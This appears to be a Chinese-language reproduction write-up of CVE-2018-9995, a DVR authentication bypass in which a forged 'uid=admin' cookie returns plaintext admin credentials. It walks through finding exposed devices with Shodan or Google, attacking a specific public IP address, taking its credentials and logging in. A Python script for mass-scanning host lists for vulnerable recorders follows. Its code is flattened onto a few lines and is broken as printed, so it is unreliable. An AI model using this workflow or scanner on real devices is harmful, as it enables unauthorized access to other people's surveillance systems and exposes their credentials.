DVR登錄繞過漏洞_CVE-2018-9995漏洞復現
一、漏洞描述
此漏洞允許攻擊者通過修改”Cookie:uid=admin”之后訪問特定DVR的控制面板,返回此設備的明文管理員憑證。
二、影響軟件以及版本
Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MDVR Login
三、漏洞復現
1、搜索引擎獲取有可能存在漏洞的設備
使用shodan、google等搜索引擎
2、訪問http://114.33.109.175/login.rsp
3、burp抓包,構造poc,放包發現獲得登錄憑證
4、使用獲得賬戶密碼登錄,成功登錄
5、批量檢查是否存在CVE-2018-9995漏洞(poc),腳本如下
import sys import requests import re def check_host(host): try: print("Checking : %s"%host) url = 'http://' + host+'/login.rsp' rr= requests.get(url,timeout=30,allow_redirects=False) if rr.status_code == 200 and re.findall("GNU rsp/1.0", rr.headers["Server"]): print("[*] CVE-2018-9995 Detection :Url is %s"%url) ff=open('result.txt','a+') ff.write('%s\n'%(url)) except: pass if __name__ == '__main__': if len(sys.argv) < 2: print("""Usage: Python3 CVE-2018-9995.py host.txt
host.txt:127.0.0.1:8080 or baidu.com """)
if len(sys.argv) >= 2: file = open(sys.argv[1]) for i in file: i = i.strip() check_host(i) file.close()
6、運行腳本
